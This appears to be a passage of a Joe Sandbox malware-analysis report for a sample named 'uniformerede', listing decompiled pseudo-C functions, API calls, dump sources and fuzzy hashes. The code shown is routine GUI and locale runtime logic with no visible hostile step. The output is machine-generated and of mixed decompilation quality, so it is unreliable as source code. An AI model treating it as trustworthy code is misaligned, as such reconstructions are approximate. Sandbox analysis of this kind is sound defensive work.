                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 004266D0
                                                                                                                                                                                                                            • 73C9AD70.GDI32(?,00000068,00000000,0042673E,?,00000000), ref: 004266EC
                                                                                                                                                                                                                            • 73C9AEA0.GDI32(5E080725,00000000,00000008,?,?,00000068,00000000,0042673E,?,00000000), ref: 00426704
                                                                                                                                                                                                                            • 73C9AEA0.GDI32(5E080725,00000008,00000008,?,5E080725,00000000,00000008,?,?,00000068,00000000,0042673E,?,00000000), ref: 0042671C
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,?,00426745,0042673E,?,00000000), ref: 00426738
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B380
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 120756276-0
                                                                                                                                                                                                                            • Opcode ID: b008b661d38c4f5ea8a9daaf1a5d07ce1dbb277d7a802cc1eb5a05b65464a69b
                                                                                                                                                                                                                            • Instruction ID: c0b5c4fbf9d89d63b7e1562d2f304591e56de7434d42fe68f424cbdc017dfa0b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b008b661d38c4f5ea8a9daaf1a5d07ce1dbb277d7a802cc1eb5a05b65464a69b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B11A531A483047EFB41DBE5AC86F6D7BA8E745718F94806BFA04AA1C1D97A6404C729
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                                                                                            			E0040CBEC(void* __esi, void* __eflags) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				intOrPtr* _t18;
                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                            				long _t29;
                                                                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t33 = __eflags;
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(_t32);
                                                                                                                                                                                                                            				_push(0x40cc83);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t32;
                                                                                                                                                                                                                            				E0040C964(GetThreadLocale(), 0x40cc98, 0x100b,  &_v8);
                                                                                                                                                                                                                            				_t29 = E00409664(0x40cc98, 1, _t33);
                                                                                                                                                                                                                            				if(_t29 + 0xfffffffd - 3 < 0) {
                                                                                                                                                                                                                            					EnumCalendarInfoA(E0040CB38, GetThreadLocale(), _t29, 4);
                                                                                                                                                                                                                            					_t27 = 7;
                                                                                                                                                                                                                            					_t18 = 0x49e770;
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						 *_t18 = 0xffffffff;
                                                                                                                                                                                                                            						_t18 = _t18 + 4;
                                                                                                                                                                                                                            						_t27 = _t27 - 1;
                                                                                                                                                                                                                            					} while (_t27 != 0);
                                                                                                                                                                                                                            					EnumCalendarInfoA(E0040CB74, GetThreadLocale(), _t29, 3);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t26);
                                                                                                                                                                                                                            				 *[fs:eax] = _t26;
                                                                                                                                                                                                                            				_push(E0040CC8A);
                                                                                                                                                                                                                            				return E004049C0( &_v8);
                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(?,00000000,0040CC83,?,?,00000000), ref: 0040CC04
                                                                                                                                                                                                                              • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040CC83,?,?,00000000), ref: 0040CC34
                                                                                                                                                                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000CB38,00000000,00000000,00000004), ref: 0040CC3F
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040CC83,?,?,00000000), ref: 0040CC5D
                                                                                                                                                                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000CB74,00000000,00000000,00000003), ref: 0040CC68
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4102113445-0
                                                                                                                                                                                                                            • Opcode ID: 902988a0099969183d8a3a73948f8a6bf1cf9f07a1a6714f5175c9c2e886427b
                                                                                                                                                                                                                            • Instruction ID: 1afeb0ae3c984d7c4f1a7fc68b04595db4598325ea28b3ac7f3617db3f710194
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 902988a0099969183d8a3a73948f8a6bf1cf9f07a1a6714f5175c9c2e886427b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70014270608204EBF701A7B5DD43F5E725CDB46B18F610737B900BA2C0D63CAE00826D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00458FB8() {
                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                            				void* _t5;
                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                            				struct HHOOK__* _t10;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				if( *0x49ebd0 != 0) {
                                                                                                                                                                                                                            					_t10 =  *0x49ebd0; // 0x0
                                                                                                                                                                                                                            					UnhookWindowsHookEx(_t10);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *0x49ebd0 = 0;
                                                                                                                                                                                                                            				if( *0x49ebd4 != 0) {
                                                                                                                                                                                                                            					_t2 =  *0x49ebcc; // 0x0
                                                                                                                                                                                                                            					SetEvent(_t2);
                                                                                                                                                                                                                            					if(GetCurrentThreadId() !=  *0x49ebc8) {
                                                                                                                                                                                                                            						_t8 =  *0x49ebd4; // 0x0
                                                                                                                                                                                                                            						WaitForSingleObject(_t8, 0xffffffff);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t5 =  *0x49ebd4; // 0x0
                                                                                                                                                                                                                            					CloseHandle(_t5);
                                                                                                                                                                                                                            					 *0x49ebd4 = 0;
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • UnhookWindowsHookEx.USER32(00000000), ref: 00458FC7
                                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00458FE2
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00458FE7
                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00458FFC
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00459007
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2429646606-0
                                                                                                                                                                                                                            • Opcode ID: 7fd3c2e6dc8ae750e94a7f2d7be103522667448ec58a17d1e6ff86980fbe391f
                                                                                                                                                                                                                            • Instruction ID: 3bc59d0302d60dcdb639d85b4c22765180d6681b902288d708a5b48c4f0846c4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7fd3c2e6dc8ae750e94a7f2d7be103522667448ec58a17d1e6ff86980fbe391f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9CF0ACB1905100EAC750EBBBED49A063395A724315F000A3BB112D71E1D73CF884CB1E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                                                            			E00445974(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				struct tagPOINT _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                            				struct tagMSG _v64;
                                                                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                                                                            				long _v72;
                                                                                                                                                                                                                            				char _v76;
                                                                                                                                                                                                                            				intOrPtr _t125;
                                                                                                                                                                                                                            				int _t126;
                                                                                                                                                                                                                            				int _t140;
                                                                                                                                                                                                                            				int _t147;
                                                                                                                                                                                                                            				intOrPtr* _t175;
                                                                                                                                                                                                                            				int _t186;
                                                                                                                                                                                                                            				void* _t191;
                                                                                                                                                                                                                            				intOrPtr* _t209;
                                                                                                                                                                                                                            				void* _t213;
                                                                                                                                                                                                                            				intOrPtr _t214;
                                                                                                                                                                                                                            				intOrPtr _t219;
                                                                                                                                                                                                                            				int _t232;
                                                                                                                                                                                                                            				intOrPtr _t233;
                                                                                                                                                                                                                            				int _t236;
                                                                                                                                                                                                                            				intOrPtr* _t242;
                                                                                                                                                                                                                            				intOrPtr _t262;
                                                                                                                                                                                                                            				intOrPtr _t278;
                                                                                                                                                                                                                            				intOrPtr _t289;
                                                                                                                                                                                                                            				int _t297;
                                                                                                                                                                                                                            				int _t300;
                                                                                                                                                                                                                            				int _t302;
                                                                                                                                                                                                                            				int _t303;
                                                                                                                                                                                                                            				int _t304;
                                                                                                                                                                                                                            				void* _t307;
                                                                                                                                                                                                                            				void* _t309;
                                                                                                                                                                                                                            				void* _t315;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t315 = __fp0;
                                                                                                                                                                                                                            				_t306 = _t307;
                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                            				_v76 = 0;
                                                                                                                                                                                                                            				_t242 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_push(_t307);
                                                                                                                                                                                                                            				_push(0x445d4c);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t307 + 0xffffffb8;
                                                                                                                                                                                                                            				_t125 =  *__edx;
                                                                                                                                                                                                                            				_t309 = _t125 - 0x202;
                                                                                                                                                                                                                            				if(_t309 > 0) {
                                                                                                                                                                                                                            					_t126 = _t125 - 0x203;
                                                                                                                                                                                                                            					__eflags = _t126;
                                                                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                                                                            						E00407A50( *((intOrPtr*)(__edx + 8)), 0,  &_v72);
                                                                                                                                                                                                                            						_t297 = E00444404(_v8,  &_v20,  &_v72, __eflags);
                                                                                                                                                                                                                            						__eflags = _t297;
                                                                                                                                                                                                                            						if(_t297 != 0) {
                                                                                                                                                                                                                            							__eflags =  *(_t297 + 4);
                                                                                                                                                                                                                            							if( *(_t297 + 4) != 0) {
                                                                                                                                                                                                                            								__eflags = _v20 - 2;
                                                                                                                                                                                                                            								if(_v20 == 2) {
                                                                                                                                                                                                                            									E004397DC();
                                                                                                                                                                                                                            									E0043BC7C( *(_t297 + 4), 0, 0, 1);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						L47:
                                                                                                                                                                                                                            						if( *((short*)(_v8 + 0x32)) != 0) {
                                                                                                                                                                                                                            							 *((intOrPtr*)(_v8 + 0x30))();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						L49:
                                                                                                                                                                                                                            						_pop(_t262);
                                                                                                                                                                                                                            						 *[fs:eax] = _t262;
                                                                                                                                                                                                                            						_push(0x445d53);
                                                                                                                                                                                                                            						return E004049C0( &_v76);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t140 = _t126 - 0xae2d;
                                                                                                                                                                                                                            					__eflags = _t140;
                                                                                                                                                                                                                            					if(_t140 == 0) {
                                                                                                                                                                                                                            						 *((intOrPtr*)(_v8 + 0x30))();
                                                                                                                                                                                                                            						__eflags =  *(__edx + 0xc);
                                                                                                                                                                                                                            						if( *(__edx + 0xc) != 0) {
                                                                                                                                                                                                                            							goto L49;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t300 =  *((intOrPtr*)( *_v8 + 4))();
                                                                                                                                                                                                                            						__eflags = _v20 - 0x12;
                                                                                                                                                                                                                            						if(_v20 != 0x12) {
                                                                                                                                                                                                                            							__eflags = _t300;
                                                                                                                                                                                                                            							if(_t300 == 0) {
                                                                                                                                                                                                                            								goto L49;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t147 = _v20 - 2;
                                                                                                                                                                                                                            							__eflags = _t147;
                                                                                                                                                                                                                            							if(_t147 == 0) {
                                                                                                                                                                                                                            								L46:
                                                                                                                                                                                                                            								E0043A91C(_t300,  &_v36);
                                                                                                                                                                                                                            								 *((intOrPtr*)( *_v8))();
                                                                                                                                                                                                                            								_v36 = _v36 - _v36 -  *((intOrPtr*)(_t300 + 0x40)) + _v36 -  *((intOrPtr*)(_t300 + 0x40));
                                                                                                                                                                                                                            								_v32 = _v32 - _v32 -  *((intOrPtr*)(_t300 + 0x44)) + _v32 -  *((intOrPtr*)(_t300 + 0x44));
                                                                                                                                                                                                                            								_v28 = _v28 -  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36 +  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36;
                                                                                                                                                                                                                            								_v24 = _v24 -  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32 +  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32;
                                                                                                                                                                                                                            								E0043AF7C(_t300,  &_v76);
                                                                                                                                                                                                                            								E00404A14( *((intOrPtr*)(_t242 + 8)) + 0x38, _v76);
                                                                                                                                                                                                                            								asm("movsd");
                                                                                                                                                                                                                            								asm("movsd");
                                                                                                                                                                                                                            								asm("movsd");
                                                                                                                                                                                                                            								asm("movsd");
                                                                                                                                                                                                                            								goto L49;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags = _t147 != 0x12;
                                                                                                                                                                                                                            							if(_t147 != 0x12) {
                                                                                                                                                                                                                            								goto L49;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L46;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						E004049C0( *((intOrPtr*)(__edx + 8)) + 0x38);
                                                                                                                                                                                                                            						goto L49;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						__eflags = _t140 == 0x12;
                                                                                                                                                                                                                            						if(_t140 == 0x12) {
                                                                                                                                                                                                                            							_t175 =  *((intOrPtr*)(__edx + 8));
                                                                                                                                                                                                                            							__eflags =  *_t175 - 0xb00b;
                                                                                                                                                                                                                            							if( *_t175 == 0xb00b) {
                                                                                                                                                                                                                            								E0044585C(_v8,  *((intOrPtr*)(_t175 + 4)),  *((intOrPtr*)(__edx + 4)), __edi);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L47;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_t309 == 0) {
                                                                                                                                                                                                                            					__eflags =  *(_v8 + 0x60);
                                                                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                                                                            						E004453A8(_v8, __eflags);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						E00407A50( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
                                                                                                                                                                                                                            						_t302 = E00444404(_v8,  &_v20,  &_v16, __eflags);
                                                                                                                                                                                                                            						__eflags = _t302;
                                                                                                                                                                                                                            						if(_t302 != 0) {
                                                                                                                                                                                                                            							__eflags = _v20 - 0x14;
                                                                                                                                                                                                                            							if(_v20 == 0x14) {
                                                                                                                                                                                                                            								_t295 =  *((intOrPtr*)(_t302 + 4));
                                                                                                                                                                                                                            								_t278 =  *0x44ff0c; // 0x44ff58
                                                                                                                                                                                                                            								_t186 = E00403D78( *((intOrPtr*)(_t302 + 4)), _t278);
                                                                                                                                                                                                                            								__eflags = _t186;
                                                                                                                                                                                                                            								if(_t186 == 0) {
                                                                                                                                                                                                                            									E0043AE9C(_t295, 0);
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									E00456FEC(_t295,  &_v20);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L47;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t191 = _t125 - 0x20;
                                                                                                                                                                                                                            				if(_t191 == 0) {
                                                                                                                                                                                                                            					GetCursorPos( &_v16);
                                                                                                                                                                                                                            					E0043AAC0( *((intOrPtr*)(_v8 + 0x14)),  &_v72,  &_v16);
                                                                                                                                                                                                                            					_v16.x = _v72;
                                                                                                                                                                                                                            					_v16.y = _v68;
                                                                                                                                                                                                                            					__eflags =  *((short*)(_t242 + 8)) - 1;
                                                                                                                                                                                                                            					if( *((short*)(_t242 + 8)) != 1) {
                                                                                                                                                                                                                            						goto L47;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					__eflags = E00441704( *((intOrPtr*)(_v8 + 0x14))) -  *((intOrPtr*)(_t242 + 4));
                                                                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                                                                            						goto L47;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					__eflags = E00440234( *((intOrPtr*)(_v8 + 0x14)),  &_v72, __eflags);
                                                                                                                                                                                                                            					if(__eflags <= 0) {
                                                                                                                                                                                                                            						goto L47;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t303 = E00444404(_v8,  &_v20,  &_v16, __eflags);
                                                                                                                                                                                                                            					__eflags = _t303;
                                                                                                                                                                                                                            					if(_t303 == 0) {
                                                                                                                                                                                                                            						goto L47;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					__eflags = _v20 - 0x12;
                                                                                                                                                                                                                            					if(_v20 != 0x12) {
                                                                                                                                                                                                                            						goto L47;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t209 =  *0x49de0c; // 0x49ebbc
                                                                                                                                                                                                                            					SetCursor(E004586EC( *_t209,  *((short*)(0x49bd44 + ( *( *((intOrPtr*)(_t303 + 0x14)) + 0x10) & 0x000000ff) * 2))));
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t242 + 0xc)) = 1;
                                                                                                                                                                                                                            					goto L49;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t213 = _t191 - 0x1e0;
                                                                                                                                                                                                                            				if(_t213 == 0) {
                                                                                                                                                                                                                            					_t214 = _v8;
                                                                                                                                                                                                                            					__eflags =  *(_t214 + 0x60);
                                                                                                                                                                                                                            					if( *(_t214 + 0x60) != 0) {
                                                                                                                                                                                                                            						E0044545C(_v8);
                                                                                                                                                                                                                            						E00407A50( *((intOrPtr*)(_t242 + 8)), 0,  &_v72);
                                                                                                                                                                                                                            						_t219 = _v8;
                                                                                                                                                                                                                            						 *(_t219 + 0x50) = _v72;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t219 + 0x54)) = _v68;
                                                                                                                                                                                                                            						E004458E4(_t306);
                                                                                                                                                                                                                            						E0044545C(_v8);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L47;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_t213 == 1) {
                                                                                                                                                                                                                            					E00407A50( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
                                                                                                                                                                                                                            					_t256 =  &_v20;
                                                                                                                                                                                                                            					_t304 = E00444404(_v8,  &_v20,  &_v16, __eflags);
                                                                                                                                                                                                                            					__eflags = _t304;
                                                                                                                                                                                                                            					if(_t304 == 0) {
                                                                                                                                                                                                                            						goto L47;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					__eflags = _v20 - 0x12;
                                                                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                                                                            						__eflags = _v20 - 2;
                                                                                                                                                                                                                            						if(_v20 != 2) {
                                                                                                                                                                                                                            							goto L47;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t232 = PeekMessageA( &_v64, E00441704( *((intOrPtr*)(_v8 + 0x14))), 0x203, 0x203, 0);
                                                                                                                                                                                                                            						__eflags = _t232;
                                                                                                                                                                                                                            						if(_t232 == 0) {
                                                                                                                                                                                                                            							_t289 =  *0x437498; // 0x4374e4
                                                                                                                                                                                                                            							_t236 = E00403D78( *((intOrPtr*)(_t304 + 4)), _t289);
                                                                                                                                                                                                                            							__eflags = _t236;
                                                                                                                                                                                                                            							if(_t236 != 0) {
                                                                                                                                                                                                                            								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t304 + 4)))) + 0xc4))();
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t233 =  *((intOrPtr*)(_t304 + 4));
                                                                                                                                                                                                                            						__eflags =  *((char*)(_t233 + 0x9b)) - 1;
                                                                                                                                                                                                                            						if( *((char*)(_t233 + 0x9b)) == 1) {
                                                                                                                                                                                                                            							__eflags =  *((char*)(_t233 + 0x5d)) - 1;
                                                                                                                                                                                                                            							if( *((char*)(_t233 + 0x5d)) == 1) {
                                                                                                                                                                                                                            								E0043B624(_t233, _t256 | 0xffffffff, 0, _t306, _t315);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L49;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E00445348(_v8,  &_v16, _t304, __eflags);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}
                                                                                                                                                                                                                            0x00445b42
                                                                                                                                                                                                                            0x00445b46
                                                                                                                                                                                                                            0x00445ba6
                                                                                                                                                                                                                            0x00445b48
                                                                                                                                                                                                                            0x00445b4e
                                                                                                                                                                                                                            0x00445b61
                                                                                                                                                                                                                            0x00445b63
                                                                                                                                                                                                                            0x00445b65
                                                                                                                                                                                                                            0x00445b6b
                                                                                                                                                                                                                            0x00445b6f
                                                                                                                                                                                                                            0x00445b75
                                                                                                                                                                                                                            0x00445b7a
                                                                                                                                                                                                                            0x00445b80
                                                                                                                                                                                                                            0x00445b85
                                                                                                                                                                                                                            0x00445b87
                                                                                                                                                                                                                            0x00445b99
                                                                                                                                                                                                                            0x00445b89
                                                                                                                                                                                                                            0x00445b8b
                                                                                                                                                                                                                            0x00445b8b
                                                                                                                                                                                                                            0x00445b87
                                                                                                                                                                                                                            0x00445b6f
                                                                                                                                                                                                                            0x00445b65
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445b46
                                                                                                                                                                                                                            0x004459a4
                                                                                                                                                                                                                            0x004459a7
                                                                                                                                                                                                                            0x00445bb4
                                                                                                                                                                                                                            0x00445bc5
                                                                                                                                                                                                                            0x00445bcd
                                                                                                                                                                                                                            0x00445bd3
                                                                                                                                                                                                                            0x00445bd6
                                                                                                                                                                                                                            0x00445bdb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445bec
                                                                                                                                                                                                                            0x00445bef
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445c00
                                                                                                                                                                                                                            0x00445c02
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445c16
                                                                                                                                                                                                                            0x00445c18
                                                                                                                                                                                                                            0x00445c1a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445c20
                                                                                                                                                                                                                            0x00445c24
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445c39
                                                                                                                                                                                                                            0x00445c46
                                                                                                                                                                                                                            0x00445c4b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445c4b
                                                                                                                                                                                                                            0x004459ad
                                                                                                                                                                                                                            0x004459b2
                                                                                                                                                                                                                            0x004459fd
                                                                                                                                                                                                                            0x00445a00
                                                                                                                                                                                                                            0x00445a04
                                                                                                                                                                                                                            0x00445a0d
                                                                                                                                                                                                                            0x00445a18
                                                                                                                                                                                                                            0x00445a1d
                                                                                                                                                                                                                            0x00445a23
                                                                                                                                                                                                                            0x00445a29
                                                                                                                                                                                                                            0x00445a2d
                                                                                                                                                                                                                            0x00445a36
                                                                                                                                                                                                                            0x00445a36
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445a04
                                                                                                                                                                                                                            0x004459b5
                                                                                                                                                                                                                            0x00445a95
                                                                                                                                                                                                                            0x00445a9a
                                                                                                                                                                                                                            0x00445aa8
                                                                                                                                                                                                                            0x00445aaa
                                                                                                                                                                                                                            0x00445aac
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445ab2
                                                                                                                                                                                                                            0x00445ab6
                                                                                                                                                                                                                            0x00445aca
                                                                                                                                                                                                                            0x00445ace
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445af0
                                                                                                                                                                                                                            0x00445af5
                                                                                                                                                                                                                            0x00445af7
                                                                                                                                                                                                                            0x00445afc
                                                                                                                                                                                                                            0x00445b02
                                                                                                                                                                                                                            0x00445b07
                                                                                                                                                                                                                            0x00445b09
                                                                                                                                                                                                                            0x00445b10
                                                                                                                                                                                                                            0x00445b10
                                                                                                                                                                                                                            0x00445b09
                                                                                                                                                                                                                            0x00445b16
                                                                                                                                                                                                                            0x00445b19
                                                                                                                                                                                                                            0x00445b20
                                                                                                                                                                                                                            0x00445b26
                                                                                                                                                                                                                            0x00445b2a
                                                                                                                                                                                                                            0x00445b35
                                                                                                                                                                                                                            0x00445b35
                                                                                                                                                                                                                            0x00445b2a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00445b20
                                                                                                                                                                                                                            0x00445ac0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004459bb

APIs
• GetCursorPos.USER32(?), ref: 00445BB4
• SetCursor.USER32(00000000,?,00000000,00445D4C), ref: 00445C46
Strings
Memory Dump Source
• Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
